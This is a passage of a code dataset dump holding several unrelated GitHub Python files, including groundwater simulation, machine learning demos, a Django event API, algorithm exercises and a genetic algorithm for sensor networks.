[\"save head\", \"save budget\"]},\n compact=True,\n)\n\nitype = flopy.mt3d.Mt3dSsm.itype_dict()\nwel_data = {}\nssm_data = {}\nwel_sp1 = []\nssm_sp1 = []\nfor k in range(nlay):\n wel_sp1.append([k, 0, 0, qinflow / nlay])\n ssm_sp1.append([k, 0, 0, 0.0, itype[\"WEL\"]])\n ssm_sp1.append([k, 0, ncol - 1, 35.0, itype[\"BAS6\"]])\nwel_data[0] = wel_sp1\nssm_data[0] = ssm_sp1\nwel = flopy.modflow.ModflowWel(swt, stress_period_data=wel_data, ipakcb=ipakcb)\n\nbtn = flopy.mt3d.Mt3dBtn(\n swt,\n nprs=-5,\n prsity=0.35,\n sconc=35.0,\n ifmtcn=0,\n chkmas=False,\n nprobs=10,\n nprmas=10,\n dt0=0.001,\n\n)\nadv = flopy.mt3d.Mt3dAdv(swt, mixelm=0)\ndsp = flopy.mt3d.Mt3dDsp(swt, al=0.0, trpt=1.0, trpv=1.0, dmcoef=dmcoef)\ngcg = flopy.mt3d.Mt3dGcg(swt, iter1=500, mxiter=1, isolve=1, cclose=1e-7)\nssm = flopy.mt3d.Mt3dSsm(swt, stress_period_data=ssm_data)\n\nvdf = flopy.seawat.SeawatVdf(\n swt,\n iwtable=0,\n densemin=0,\n densemax=0,\n denseref=1000.0,\n denseslp=0.7143,\n firstdt=1e-3,\n)\n\nswt.write_input()\n\nsuccess, buff = swt.run_model(silent=True, report=True)\nif not success:\n raise Exception(\"SEAWAT did not terminate normally.\")\n\nucnobj = bf.UcnFile(\"MT3D001.UCN\", model=swt)\ntimes = ucnobj.get_times()\nconcentration = ucnobj.get_data(totim=times[-1])\n\ncbbobj = bf.CellBudgetFile(\"henry.cbc\")\ntimes = cbbobj.get_times()\nqx = cbbobj.get_data(text=\"flow right face\", totim=times[-1])[0]\nqy = np.zeros((nlay, nrow, ncol), dtype=float)\nqz = cbbobj.get_data(text=\"flow lower face\", totim=times[-1])[0]\n\nfig = plt.figure(figsize=(12,9))\nax = fig.add_subplot(1, 1, 1, aspect=\"equal\")\npmv = flopy.plot.PlotCrossSection(model=swt, ax=ax, line={\"row\": 0})\narr = pmv.plot_array(concentration)\npmv.plot_vector(qx, qy, -qz, color=\"white\", kstep=3, hstep=3)\nplt.colorbar(arr, shrink=0.5, ax=ax)\nax.set_title(\"Simulated Concentrations\");\nplt.show()\n\nheadobj = bf.HeadFile(\"henry.hds\")\ntimes = headobj.get_times()\nhead = headobj.get_data(totim=times[-1])\n\nfig = plt.figure(figsize=(12, 9))\nax = fig.add_subplot(1, 1, 1, aspect=\"equal\")\npmv = flopy.plot.PlotCrossSection(model=swt, ax=ax, line={\"row\": 0})\narr = pmv.plot_array(head)\ncontours = pmv.contour_array(head, colors=\"white\")\nax.clabel(contours, fmt=\"%2.2f\")\nplt.colorbar(arr, shrink=0.5, ax=ax)\nax.set_title(\"Simulated Heads\");\nplt.show()","repo_name":"connorcleary/code_cdrive","sub_path":"swgw/scripts/henry_seawat.py","file_name":"henry_seawat.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13480875285","text":"from .Describer import Describer\n\n\nclass GeneralDescriber(Describer):\n TEMP_SKEW_THRESHOLD = 0.4\n\n def get_section_header(self):\n return \"General frame info\"\n\n def describe(self, df):\n messages = [f\"Shape: {df.shape}\"]\n\n # NULLS\n columns_with_nulls = df.columns[df.isna().any()].array.to_numpy()\n if len(columns_with_nulls) > 0:\n messages.append(\n f\"Columns with one or more null values: {columns_with_nulls}\"\n )\n\n return messages\n","repo_name":"jammerware/pandashape","sub_path":"src/pandashape/describers/GeneralDescriber.py","file_name":"GeneralDescriber.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"12401111979","text":"from functions1 import sigmoid\nimport numpy as np\nimport pandas_ex01 as pd\nimport matplotlib.pyplot as plt\n\ndata = [[2, 0], [4, 0], [6, 0], [8, 1], [10, 1], [12, 1], [14, 1]]\n\nx_data = [i[0] for i in data]\ny_data = [i[1] for i in data]\n\nplt.scatter(x_data, y_data)\nplt.xlim(0, 15)\nplt.ylim(-0.1, 1.1)\n# plt.show()\n\na, b = 0, 0\nlr = 0.05\n\nfor i in range(2001):\n for x_data, y_data in data:\n a_diff = x_data*(sigmoid(a * x_data + b) - y_data)\n b_diff = sigmoid(a * x_data + b) - y_data\n\n a = a - (lr * a_diff)\n b = b - (lr * b_diff)\n\n if i % 100 == 0:\n print(f'epoch={i}, 기울기={a:.04f}, 절편={b:.04f}')\n\nplt.scatter(x_data, y_data)\nplt.xlim(0, 15)\nplt.ylim(-0.1, 1.1)\nx_range = (np.arange(0, 15, 0.1))\nplt.plot(x_range, np.array([sigmoid(a * x + b) for x in x_range]))\nplt.show()\n","repo_name":"kimhyeongju/coding_practice","sub_path":"DeepLearning/logisticRegression.py","file_name":"logisticRegression.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"15195198838","text":"from transaction import Transactions\n\n\nif __name__ == \"__main__\":\n transaction = Transactions()\n\n print(f\"Hello User {transaction.id}\")\n print(\"Please add some items\")\n\n item_list = []\n item = {}\n while True:\n item_name = input(\"Item Name :\")\n try:\n if int(item_name):\n print(\"You cannot fill the item beginning with digit\")\n continue\n except:\n pass\n else:\n pass\n\n count = input(\"Count :\")\n try:\n count = int(count)\n except:\n print(\"You cannot fill count with alphabets\")\n continue\n \n price = input(\"Price :\")\n try:\n price = int(price)\n except:\n print(\"You cannot fill price with alphabets\")\n continue\n \n \n item[item_name] = {\n \"count\":count,\n \"price\":price\n }\n\n item_list.append(item)\n print(f\"Item ={item_name}\")\n print(f\"Count ={count}\")\n print(f\"Price ={price}\")\n \n print(item_list)\n\n if input(\"add again ?(y/n)\") != \"y\":\n transaction.add_items(items=item_list)\n break\n else:\n continue\n \n while True:\n next_step = int(input(\n \"\"\"\n what you want to do next ?\n [1] edit item\n [2] delete item\n [3] reset chart \n [4] finish\n \"\"\"\n ))\n\n if next_step == 1:\n transaction.show_cart()\n name = input(\"what item you want to edit ?\")\n if transaction.check_list_item(item_name=name):\n item_name = input(\"Item Name :\")\n count = int(input(\"Count :\"))\n price = int(input(\"Price :\"))\n \n print(f\"Item ={item_name}\")\n print(f\"Count ={count}\")\n print(f\"Price ={price}\")\n\n transaction.edit_item(name=name, item=item_name, count=count, price=price)\n \n if next_step == 2:\n dele = input(\"What item you want to delete ?\")\n transaction.delete_item(item=dele)\n\n if next_step == 3:\n print(\"Reset Chart\")\n transaction.reset_cart()\n\n if next_step == 4:\n print(\"Finish Process\")\n transaction.show_cart()\n break","repo_name":"AlifvianM/Pacmann-SuperStoreApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"5223541074","text":"\"\"\"\nWrite a function that takes 2 non-empty arrays of integers and returns an array of 2 numbers (one from each array) whose absolute difference is the smallest. The number in the first array should appear first in the return array.\nTC: O(nlog(n) + mlog(m)), where n is the length of array1 and m is the length of array2\nSC: O(1)\n\"\"\"\ndef smallest_difference(array1, array2):\n array1.sort(), array2.sort()\n\n smallest_diff, pair = float('inf'), []\n p1 = p2 = 0\n\n while p1 < len(array1) and p2 < len(array2):\n diff = abs(array1[p1] - array2[p2])\n if diff < smallest_diff:\n smallest_diff, pair = diff, [array1[p1], array2[p2]]\n\n if p1 + 1 == len(array1):\n p2 += 1\n elif p2 + 1 == len(array2):\n p1 += 1\n elif abs(array1[p1 + 1] - array2[p2]) > abs(array1[p1] - array2[p2 + 1]):\n p2 += 1\n elif p2 + 1 == len(array2) or abs(array1[p1 + 1] - array2[p2]) < abs(array1[p1] - array2[p2 + 1]):\n p1 += 1\n else:\n p1, p2 = p1 + 1, p2 + 1\n\n return pair\n\n\nif __name__ == \"__main__\":\n # print(smallest_difference(\n # [-1, 5, 10, 20, 28, 3],\n # [26, 134, 135, 15, 17]\n # ))\n\n # print(smallest_difference(\n # [-1, 5, 10, 20, 3],\n # [26, 134, 135, 15, 17]\n # ))\n\n # print(smallest_difference(\n # [240, 124, 86, 111, 2, 84, 954, 27, 89],\n # [1, 3, 954, 19, 8]\n # ))\n\n print(smallest_difference(\n [10, 1000, 9124, 2142, 59, 24, 596, 591, 124, -123, 530],\n [-1441, -124, -25, 1014, 1500, 660, 410, 245, 530]\n ))\n","repo_name":"mattdepillis/python_dsa","sub_path":"ae_questions/arrays/medium/smallest_difference/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"22681412253","text":"#KHỞI TẠO\r\nimport numpy as np\r\nimport plotly.express as px\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport tensorflow as tf\r\nfrom sklearn.metrics import accuracy_score, classification_report\r\n\r\ntrain_dir = r'C:\\Users\\ADMIN\\Downloads\\XLA\\Data\\dataset2-master\\dataset2-master\\images\\TRAIN'\r\ntest_dir = r'C:\\Users\\ADMIN\\Downloads\\XLA\\Data\\dataset2-master\\dataset2-master\\images\\TEST'\r\n\r\n#LOAD DATA ẢNH\r\n#KHỞI TẠO GENERATORS\r\ntrain_gen = tf.keras.preprocessing.image.ImageDataGenerator(\r\n preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input,\r\n validation_split=0.2\r\n)\r\ntest_gen = tf.keras.preprocessing.image.ImageDataGenerator(\r\n preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input\r\n)\r\n\r\n#FLOW DATA ẢNH VÀO CÁC DIRECTORY\r\ntrain_images = train_gen.flow_from_directory( #80% of directory go to here\r\n directory=train_dir,\r\n target_size=(224, 224),\r\n color_mode='rgb',\r\n class_mode='categorical',\r\n batch_size=32,\r\n shuffle=True,\r\n seed=42,\r\n subset='training'\r\n)\r\nval_images = train_gen.flow_from_directory( #another 20% go to here\r\n directory=train_dir,\r\n target_size=(224, 224),\r\n color_mode='rgb',\r\n class_mode='categorical',\r\n batch_size=32,\r\n shuffle=False,\r\n seed=42,\r\n subset='validation'\r\n)\r\ntest_images = test_gen.flow_from_directory( \r\n directory=test_dir,\r\n target_size=(224, 224),\r\n color_mode='rgb',\r\n class_mode='categorical',\r\n batch_size=32,\r\n shuffle=False,\r\n seed=42\r\n)\r\n\r\ntrain_images.next()[1]\r\n\r\n#Build Pretrained Model\r\npretrained_model = tf.keras.applications.MobileNetV2(\r\n input_shape=(224, 224, 3),\r\n include_top=False,\r\n weights='imagenet',\r\n pooling='avg'\r\n)\r\npretrained_model.trainable = False\r\n\r\n#Build Classification Model\r\ninputs = pretrained_model.input\r\nx = tf.keras.layers.Dense(128, activation='relu')(pretrained_model.output)\r\noutputs = tf.keras.layers.Dense(4, activation='softmax')(x)\r\n\r\nmodel = tf.keras.Model(inputs=inputs, outputs=outputs)\r\n\r\nmodel.compile(\r\n optimizer='adam',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy']\r\n)\r\nprint(model.summary())\r\n\r\n#Training\r\nhistory = model.fit(\r\n train_images,\r\n validation_data=val_images,\r\n epochs=30,\r\n callbacks=[\r\n tf.keras.callbacks.EarlyStopping(\r\n monitor='val_loss',\r\n patience=3,\r\n restore_best_weights=True\r\n )\r\n ]\r\n)\r\n\r\nfig = px.line(\r\n history.history,\r\n y=['loss','val_loss'],\r\n labels={'index':\"Epoch\", \"value\": \"Loss\"},\r\n title=\"Training and Validation Loss Over Time\"\r\n)\r\nfig.show()\r\n\r\n#KẾT QUẢ\r\nCLASS_NAMES = list(train_images.class_indices.keys())\r\nCLASS_NAMES\r\n\r\npredictions = np.argmax(model.predict(val_images), axis=1)\r\n\r\nacc = accuracy_score(val_images.labels, predictions)\r\ncm = tf.math.confusion_matrix(val_images.labels, predictions)\r\nclr = classification_report(val_images.labels, predictions, target_names=CLASS_NAMES)\r\n\r\nprint(\"Validation Accuracy: {:.3f}%\".format(acc * 100))\r\n\r\nplt.figure(figsize=(8, 8))\r\nsns.heatmap(cm, annot=True, fmt='g', vmin=0, cmap='Blues', cbar=False)\r\nplt.xticks(ticks= np.arange(4) + 0.5, labels=CLASS_NAMES)\r\nplt.yticks(ticks= np.arange(4) + 0.5, labels=CLASS_NAMES)\r\nplt.xlabel(\"Dự đoán\")\r\nplt.ylabel(\"Thực tế\")\r\nplt.title(\"Ma trận lỗi\")\r\nplt.show()\r\n\r\nprint(\"Classification Report:\\n----------------------\\n\", clr)\r\n\r\nmodel.save('model.h5')","repo_name":"HuynhQuocDan/Code_Final_Report_AI","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"72364285056","text":"\n# heuristic: tim ra ket noi tieu hao nang luong lon nhat\n# GA: tim ra ca the co tieu hao nang luong nho nhat\n\nimport random, time, os, sys\nlib_path = os.path.abspath(os.path.join('..'))\nsys.path.append(lib_path)\n\nfrom .heuristic import *\n\n\nGEN = 100\nCP = 0.8\nMP = 0.1\nNUM_OF_INDIVIDUALS = 100\nTERMINATE = 30\nalpha = 0.5\n\ndef random_init_individual(num_relay):\n \"Initial individual with any num of relay\"\n indi = []\n Y = random.randint(1, num_relay)\n xs = Y/num_relay\n count_relay = 0\n for i in range(0, num_relay):\n xx = random.random()\n if xx < xs:\n indi.append(1)\n else:\n indi.append(0)\n return indi\n\ndef count_current_relay(individual):\n sum = 0\n for g in individual:\n if g == 1:\n sum += 1\n return sum\n\n# mom and dad instead of parent1 and parent2 =)\ndef cross(mom, dad):\n num_relay = len(mom)\n mid = random.randint(0, num_relay-1)\n child1 = mom[:mid] + dad[mid:]\n child2 = dad[:mid] + mom[mid:]\n return child1, child2\n\n\ndef mutate(original):\n fake = original[:]\n ll = len(fake)\n count1 = 0\n count2 = 0\n id1 = random.randint(0, ll-1)\n while fake[id1] == 0:\n count1 += 1\n id1 = random.randint(0, ll-1)\n if count1 >= 2*ll:\n break\n id2 = random.randint(0, ll-1)\n while fake[id2] == 1:\n count2 += 1\n id2 = random.randint(0, ll-1)\n if count2 >= 2*ll:\n break\n fake[id1], fake[id2] = fake[id2], fake[id1]\n return fake\n\ndef normalize_loss(indi):\n if indi[1].loss(alpha) < 0:\n return float(\"inf\")\n else:\n return 10000*indi[1].loss(alpha) + indi[1].total_tranmission_loss()\n\n# def sort(individuals):\n# ll = len(individuals)\n# new_indis = individuals[:]\n# for i in range(len(individuals)):\n# for j in range(i+1, len(individuals)):\n# if new_indis[i][1].loss(alpha) > new_indis[j][1].loss(alpha):\n# new_indis[i], new_indis[j] = new_indis[j], new_indis[i]\n# elif new_indis[i][1].loss(alpha) == new_indis[j][1].loss(alpha):\n# if new_indis[i][1].total_tranmission_loss() > new_indis[j][1].total_tranmission_loss():\n# new_indis[i], new_indis[j] = new_indis[j], new_indis[i]\n# return new_indis\n\ndef GA(inp: WusnInput) -> int:\n # Khoi tao quan the\n individuals = []\n\n # Cac ca the da duoc tinh toan\n calculated = {}\n\n for i in range (0, NUM_OF_INDIVIDUALS):\n indi = random_init_individual(inp.num_of_relays)\n out = heuristic(inp, indi)\n \n calculated[str(indi)] = out\n individuals.append([indi, out])\n\n print(individuals[0])\n \n count_stable = 0\n max_c = individuals[0][1].loss(alpha)\n prev_max = individuals[0][1].loss(alpha)\n\n # Iterate through generations\n for it in range(0, GEN):\n start = time.time()\n none = 0\n not_none = 0\n # Crossover and mutation\n for id1 in range(0, NUM_OF_INDIVIDUALS):\n id2 = 0\n xx = random.random()\n if xx < CP:\n id2 = random.randint(0, NUM_OF_INDIVIDUALS-1)\n while id2 == id1:\n id2 = random.randint(0, NUM_OF_INDIVIDUALS-1)\n son, daughter = cross(individuals[id1][0], individuals[id2][0])\n\n if str(son) in calculated:\n out1 = calculated[str(son)]\n else:\n s = time.time()\n out1 = heuristic(inp, son)\n t = time.time()\n \n if str(daughter) in calculated:\n out2 = calculated[str(daughter)]\n else:\n # s = time.time()\n out2 = heuristic(inp, daughter)\n # t = time.time()\n\n if out1.mapping == {}:\n none += 1\n else: \n not_none += 1\n if out2.mapping == {}:\n none += 1\n else:\n not_none += 1\n\n individuals.append([son, out1])\n individuals.append([daughter, out2])\n\n xx2 = random.random()\n if xx2 < MP:\n grand_child1 = mutate(son)\n grand_child2 = mutate(daughter)\n m_out1 = heuristic(inp, grand_child1)\n m_out2 = heuristic(inp, grand_child2)\n\n if m_out1.mapping == {}:\n none += 1\n else:\n not_none += 1\n if m_out2.mapping == {}:\n none += 1\n else: \n not_none += 1\n\n individuals.append([grand_child1, m_out1])\n individuals.append([grand_child2, m_out2])\n\n individuals2 = sorted(individuals, key=normalize_loss)\n # individuals2 = sort(individuals)\n individuals = individuals2[:NUM_OF_INDIVIDUALS-1] \n individuals.append(individuals2[-1])\n if individuals[0][1].loss(alpha) < max_c:\n max_c = individuals[0][1].loss(alpha)\n if individuals[0][1].loss(alpha) == prev_max:\n count_stable += 1\n else:\n count_stable = 0\n if count_stable == TERMINATE:\n print(\"TERMINATE\")\n break\n prev_max = individuals[0][1].loss(alpha)\n end = time.time()\n print(\"none: %d, not_none: %d\" % (none, not_none))\n print(\"Gen: %d, time: %fs, min: %f %f %f\" % (it, end - start, len(individuals[0][1].used_relays), individuals[0][1].loss(alpha), individuals[NUM_OF_INDIVIDUALS-1][1].loss(alpha)))\n # print(max_c)\n return individuals[0]\n\n# Bo sung dieu kien SN va RN co ket noi duoc voi nhau hay khong bang cach them ban kinh sn va rn\n","repo_name":"duymanh96w/WusnNewModel","sub_path":"GAwHeuristic/GA.py","file_name":"GA.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"2549869304","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nThis script contains the class for studying oscillating clusters on videos in 2D\r\n\"\"\"\r\n\r\nfrom cv2 import (\r\n connectedComponents, connectedComponentsWithStats, MORPH_CROSS,\r\n getStructuringElement, CV_16U, erode, dilate, morphologyEx, MORPH_OPEN,\r\n MORPH_CLOSE, MORPH_GRADIENT, BORDER_CONSTANT, resize, imshow, waitKey,\r\n FONT_HERSHEY_SIMPLEX, putText)\r\nfrom numpy import (\r\n append, float32, sum, mean, zeros, empty, array, nonzero, unique,\r\n isin, logical_or, logical_not, greater, uint8,\r\n uint32, min, any)\r\nfrom cellects.image_analysis.morphological_operations import get_minimal_distance_between_2_shapes\r\n\r\n\r\nclass ClusterFluxStudy:\r\n def __init__(self, dims):\r\n self.dims = dims\r\n\r\n self.pixels_data = empty((4, 0), dtype=uint32)\r\n self.clusters_id = zeros(self.dims[1:], dtype=uint32)\r\n # self.alive_clusters_in_flux = empty(0, dtype=uint32)#list()\r\n self.cluster_total_number = 0\r\n self.cross_33 = getStructuringElement(MORPH_CROSS, (3, 3))\r\n\r\n def update_flux(self, t, contours, current_flux, period_tracking, clusters_final_data):\r\n # flux_dir_changed = logical_xor(current_flux, self.clusters_id)\r\n # Save the data from pixels that are not anymore in efflux\r\n lost = greater(self.clusters_id > 0, current_flux > 0)\r\n # lost = logical_not(equal(current_flux > 0, self.clusters_id > 0))\r\n # lost = flux_dir_changed * (self.clusters_id > 0)\r\n # lost_coord = nonzero(lost)\r\n # if any(lost):\r\n # Some pixels of that cluster faded, save their data\r\n lost_data = nonzero(lost)\r\n lost_data = array((period_tracking[lost], # lost_coord[0], lost_coord[1],\r\n self.clusters_id[lost], lost_data[0], lost_data[1]), dtype=uint32)\r\n # Add this to the array containing the data of each cluster that are still alive\r\n self.pixels_data = append(self.pixels_data, lost_data, axis=1)\r\n # Stop considering these pixels in period_tracking because they switched\r\n period_tracking[lost] = 0\r\n current_period_tracking = zeros(self.dims[1:], dtype=bool)\r\n for curr_clust_id in unique(current_flux)[1:]:\r\n # Get all pixels that were in the same flux previously\r\n curr_clust = current_flux == curr_clust_id\r\n already = self.clusters_id * curr_clust\r\n new = greater(curr_clust, self.clusters_id > 0)\r\n # new = flux_dir_changed * (current_flux == curr_clust_id)\r\n\r\n if not any(already):\r\n # It is an entirely new cluster:\r\n cluster_pixels = new\r\n self.cluster_total_number += 1\r\n cluster_name = self.cluster_total_number\r\n # self.alive_clusters_in_flux = append(self.alive_clusters_in_flux, cluster_name)\r\n else:\r\n # Check whether parts of that cluster correspond to several clusters in clusters_id\r\n cluster_names = unique(already)[1:]\r\n # keep only one cluster name to gather clusters that just became connected\r\n cluster_name = min(cluster_names)\r\n # Put the same cluster name for new ones and every pixels that were\r\n # a part of a cluster touching the current cluster\r\n cluster_pixels = logical_or(isin(self.clusters_id, cluster_names), new)\r\n # new = self.clusters_id == cluster_names\r\n # If they are more than one,\r\n if len(cluster_names) > 1:\r\n # Update these cluster names in pixels_data\r\n self.pixels_data[1, isin(self.pixels_data[1, :], cluster_names)] = cluster_name\r\n # self.pixels_data[self.pixels_data[1, :] == cluster_names] = cluster_name\r\n # Update these cluster names in alive_clusters_in_flux: remove names that are not used anymore\r\n # self.alive_clusters_in_flux = delete(self.alive_clusters_in_flux, isin(self.alive_clusters_in_flux, cluster_names[cluster_names != cluster_name]))\r\n # cluster_names_to_remove = cluster_names.copy()\r\n # cluster_names_to_remove = delete(cluster_names_to_remove,\r\n # nonzero(cluster_names_to_remove == cluster_name))\r\n # # Remove the deleted clusters from the alive cluster list\r\n # [self.alive_clusters_in_flux.remove(i) for i in cluster_names_to_remove if i in self.alive_clusters_in_flux]\r\n # Update clusters_id\r\n self.clusters_id[cluster_pixels] = cluster_name\r\n # Update period_tracking\r\n current_period_tracking[curr_clust] = True\r\n\r\n period_tracking[current_period_tracking] += 1\r\n # Remove lost pixels from clusters_id\r\n self.clusters_id[lost] = 0\r\n # self.alive_clusters_in_flux = self.alive_clusters_in_flux[isin(self.alive_clusters_in_flux, unique(self.clusters_id))]\r\n\r\n # Find out which clusters are still alive or not\r\n # still_alive_clusters = isin(self.pixels_data[1, :], self.alive_clusters_in_flux)\r\n still_alive_clusters = isin(self.pixels_data[1, :], unique(self.clusters_id))\r\n clusters_to_archive = unique(self.pixels_data[1, logical_not(still_alive_clusters)])\r\n # store their data in clusters_final_data\r\n for cluster in clusters_to_archive:\r\n cluster_bool = self.pixels_data[1, :] == cluster\r\n cluster_size = sum(cluster_bool)\r\n cluster_img = zeros(self.dims[1:], dtype=uint8)\r\n cluster_img[self.pixels_data[2, cluster_bool], self.pixels_data[3, cluster_bool]] = 1\r\n if any(dilate(cluster_img, kernel=self.cross_33, borderType=BORDER_CONSTANT, borderValue=0) * contours):\r\n minimal_distance = 1\r\n else:\r\n if cluster_size > 200:\r\n cluster_img = nonzero(morphologyEx(cluster_img, MORPH_GRADIENT, self.cross_33))\r\n contours[cluster_img] = 2\r\n else:\r\n contours[self.pixels_data[2, cluster_bool], self.pixels_data[3, cluster_bool]] = 2\r\n # Get the minimal distance between the border of the cell(s) (noted 1 in contours)\r\n # and the border of the cluster in the cell(s) (now noted 2 in contours)\r\n minimal_distance = get_minimal_distance_between_2_shapes(contours)\r\n data_to_save = array([[mean(self.pixels_data[0, cluster_bool]), t,\r\n cluster_size, minimal_distance]], dtype=float32)\r\n clusters_final_data = append(clusters_final_data, data_to_save,\r\n axis=0) # [\"mean_pixel_period\", \"total_size\", \"death_time\"]\r\n # and remove their data from pixels_data\r\n self.pixels_data = self.pixels_data[:, still_alive_clusters]\r\n\r\n return period_tracking, clusters_final_data\r\n\r\n\r\n","repo_name":"Aurele-B/Cellects","sub_path":"src/cellects/image_analysis/cluster_flux_study.py","file_name":"cluster_flux_study.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"74634275454","text":"\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import status, serializers\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\n\nfrom .models import Event, Category, Tipology\nfrom django.http import JsonResponse\nfrom event.serializers import CategorySerializer, EventSerializer, TipologySerializer\n\nimport json\n\n# Create your views here.\n\n@csrf_exempt\ndef add_user_view(request):\n message = \"\"\n if request.method == 'POST':\n jsonUser = json.loads(request.body.decode('utf-8'))\n password = jsonUser['password']\n email = jsonUser['email']\n\n user_model = User.objects.create_user(username=email, password=password)\n user_model.email = email\n user_model.save()\n message = 'Usuario Registrado'\n\n return JsonResponse({'message':message}, status=status.HTTP_200_OK)\n\n@csrf_exempt\ndef login_user_view(request):\n message = \"\"\n status_code = status.HTTP_200_OK\n if request.method == 'POST':\n jsonUser = json.loads(request.body.decode('utf-8'))\n username = jsonUser['email']\n password = jsonUser['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n message = 'usuario logeado: ' + str(user.pk)\n return JsonResponse({'message': message, 'id':user.pk}, status=status_code)\n else:\n message = 'Usuario o contrasenia incorrectos.'\n status_code = status.HTTP_401_UNAUTHORIZED\n return JsonResponse({'message': message}, status=status_code)\n\n \n\n\n@csrf_exempt\ndef all_events_view(request):\n if request.method == 'GET':\n user = request.GET.get('userId')\n event_list = Event.objects.filter(creation_user=user).order_by('-creation_date')\n serializer = EventSerializer(event_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@csrf_exempt\ndef add_event_view(request):\n if request.method == 'POST':\n jsonEvent = json.loads(request.body.decode('utf-8'))\n name = jsonEvent['name']\n detail = jsonEvent['detail']\n place = jsonEvent['place']\n address = jsonEvent['address']\n start_date = jsonEvent['start_date']\n end_date = jsonEvent['end_date']\n category_type = jsonEvent['category_type']\n event_type = jsonEvent['event_type']\n creation_user = jsonEvent['creation_user']\n\n category_model = Category.objects.get(pk=category_type)\n tipology_model = Tipology.objects.get(pk=event_type)\n user_model = User.objects.get(pk=creation_user)\n\n event_model = Event()\n event_model.name = name\n event_model.detail = detail\n event_model.place = place\n event_model.address = address\n event_model.start_date = start_date\n event_model.end_date = end_date\n event_model.category_type = category_model\n event_model.event_type = tipology_model\n event_model.creation_user = user_model\n event_model.save()\n message = 'Evento Registrado'\n\n return JsonResponse({'message': message})\n\n\n@csrf_exempt\ndef edit_event_view(request):\n message = \"\"\n if request.method == 'POST':\n jsonEvent = json.loads(request.body.decode('utf-8'))\n id= jsonEvent['id']\n name = jsonEvent['name']\n detail = jsonEvent['detail']\n place = jsonEvent['place']\n address = jsonEvent['address']\n start_date = jsonEvent['start_date']\n end_date = jsonEvent['end_date']\n category_type = jsonEvent['category_type']\n event_type = jsonEvent['event_type']\n creation_user = jsonEvent['creation_user']\n\n category_model = Category.objects.get(pk=category_type)\n tipology_model = Tipology.objects.get(pk=event_type)\n user_model = User.objects.get(pk=creation_user)\n\n event_model = Event.objects.get(pk=id)\n event_model.name = name\n event_model.detail = detail\n event_model.place = place\n event_model.address = address\n event_model.start_date = start_date\n event_model.end_date = end_date\n event_model.category_type = category_model\n event_model.event_type = tipology_model\n event_model.creation_user = user_model\n event_model.save()\n message = 'Evento: ' + str(event_model.pk) + ' actualizado'\n\n return JsonResponse({'message': message})\n\n\n@csrf_exempt\ndef delete_event_view(request):\n message = \"\"\n if request.method == 'POST':\n jsonEvent = json.loads(request.body.decode('utf-8'))\n id = jsonEvent['id']\n event_model = Event.objects.get(pk=id).delete()\n message = 'Evento:' + id + ' eliminado'\n\n return JsonResponse({'message': message})\n\n\n@csrf_exempt\ndef category_event_view(request):\n if request.method == 'GET':\n category_model = Category.objects.all()\n serializer = CategorySerializer(category_model, many=True)\n\n return JsonResponse(serializer.data, safe=False)\n\n\n@csrf_exempt\ndef tipology_event_view(request):\n if request.method == 'GET':\n typology_model = Category.objects.all()\n serializer = TipologySerializer(typology_model, many=True)\n\n return JsonResponse(serializer.data, safe=False)\n\n\n","repo_name":"emantilla/bdb-test-backend","sub_path":"event/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"73815683136","text":"from llama_index import SimpleDirectoryReader, GPTListIndex, readers, GPTSimpleVectorIndex, LLMPredictor, PromptHelper, ServiceContext\nfrom langchain import OpenAI\nimport os\n\nos.environ[\"OPENAI_API_KEY\"] = 'YOUR_API_KEY_HERE'\n\ndef construct_index(directory_path):\n # set maximum input size\n max_input_size = 4096\n # set number of output tokens\n num_outputs = 2000\n # set maximum chunk overlap\n max_chunk_overlap = 20\n # set chunk size limit\n chunk_size_limit = 600 \n\n # define prompt helper\n prompt_helper = PromptHelper(max_input_size, num_outputs, max_chunk_overlap, chunk_size_limit=chunk_size_limit)\n\n # define LLM\n llm_predictor = LLMPredictor(llm=OpenAI(temperature=0.5, model_name=\"text-davinci-003\", max_tokens=num_outputs))\n \n documents = SimpleDirectoryReader(directory_path).load_data()\n \n service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor, prompt_helper=prompt_helper)\n index = GPTSimpleVectorIndex.from_documents(documents, service_context=service_context)\n\n return index\n\n# Save the index to disk outside of construct_index\nif not os.path.isfile('index.json'):\n index = construct_index('context_data/iotium')\n index.save_to_disk('index.json')\n\ndef ask_ai():\n index = GPTSimpleVectorIndex.load_from_disk('index.json')\n while True: \n query = input(\"What do you want to ask? \")\n response = index.query(query)\n print(f\"Response: 